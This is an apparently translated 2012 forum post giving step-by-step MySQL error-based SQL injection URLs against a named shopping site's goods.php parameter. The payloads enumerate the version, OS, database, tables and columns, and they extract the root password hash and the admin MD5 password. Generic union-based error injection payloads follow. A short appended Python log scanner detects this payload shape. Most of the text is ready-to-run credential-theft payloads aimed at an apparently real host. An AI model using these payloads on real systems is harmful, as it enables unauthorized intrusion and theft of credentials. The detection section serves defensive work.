Blind injection in detail

Posted by the OP on 2012-9-5 14:59:30
Determine the version number
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23

Determine the operating system
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version_compile_os%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23

Current user()

http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20user()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23

Current database()
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20database()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23

root hash
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20Password%20from%20mysql.user%20where%20User=char(114,111,111,116)),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23

Current database table names

http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20TABLE_NAME%20%20from%20information_schema.tables%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20limit%206,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23

user_name column of the current database
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%202,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23

password column of the current database
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%204,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
Obtain the admin password (md5)
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20concat_ws(char(94),ifnull(cast(%60password%60%20as%20char),char(32)),ifnull(cast(%60user_name%60%20as%20char),char(32)))%20%20from%20sansan1.ecs_admin_user%20limit%200,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
Error-based injection
SELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select version()) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)
SELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select username FROM admin_table LIMIT 0,1) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)

and(select 1 from(select count(*),concat((select (select (Select concat(0x7e,0x27,SCHEMA_NAME,0x27,0x7e) FROM information_schema.SCHEMATA LIMIT 21,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
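As an added example (not part of the forum post), a detection-side check: every payload above has the same shape, a COUNT(*) ... GROUP BY over concat(<probe>, floor(rand()*2)), so a log scanner can URL-decode request targets and flag that shape together with information_schema enumeration, mysql.user reads and char()-obfuscated string literals. The log lines, host names and addresses are constructed placeholders, and the signature names are my own.

```python
import re
from urllib.parse import unquote_plus

# Defensive signatures for the error-based injection shape seen above:
# COUNT(*) ... GROUP BY over concat(<probe>, floor(rand()*2)), where the
# duplicate-key error leaks the probed value. Written for this added example.
SIGNATURES = {
    "dup_key_probe": re.compile(r"count\(\s*\*\s*\).*floor\(\s*rand\(.*group\s+by", re.S),
    "schema_enum":   re.compile(r"information_schema\.(tables|columns|schemata)"),
    "mysql_user":    re.compile(r"mysql\.user"),
    "char_obfusc":   re.compile(r"char\(\s*\d+(\s*,\s*\d+)+\s*\)"),
}

def normalize(raw_target: str) -> str:
    """Decode the request target the way the database would see it: undo URL
    encoding (twice, to catch double encoding), lowercase, collapse whitespace."""
    decoded = unquote_plus(unquote_plus(raw_target))
    return re.sub(r"\s+", " ", decoded.lower())

def classify_request(raw_target: str) -> list:
    """Return the names of the signatures matched by one request target."""
    text = normalize(raw_target)
    return [name for name, rx in SIGNATURES.items() if rx.search(text)]

# Minimal combined-log parser: only the request target is needed here.
LOG_RE = re.compile(r'"(?:GET|POST) (?P<target>\S+) HTTP/[\d.]+"')

def scan_log(lines):
    """Yield (target, matched signature names) for every request that matches."""
    for line in lines:
        m = LOG_RE.search(line)
        if not m:
            continue
        hits = classify_request(m.group("target"))
        if hits:
            yield m.group("target"), hits

# Constructed sample log lines (addresses and payload values are placeholders).
SAMPLE_LOG = [
    '10.0.0.5 - - [05/Sep/2012:14:59:30 +0800] "GET /goods.php?id=352&wsid=1 HTTP/1.1" 200 5120',
    '10.0.0.9 - - [05/Sep/2012:15:01:02 +0800] "GET /goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23 HTTP/1.1" 500 312',
    '10.0.0.9 - - [05/Sep/2012:15:01:40 +0800] "GET /goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20TABLE_NAME%20from%20information_schema.tables%20where%20TABLE_SCHEMA=char(115,97,110)%20limit%206,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23 HTTP/1.1" 500 318',
]

if __name__ == "__main__":
    for target, hits in scan_log(SAMPLE_LOG):
        print(hits, target[:60])
```

Pair the signature hits with the response status: the same source producing repeated 500s on one endpoint is the strongest indicator that the duplicate-key error is actually being returned.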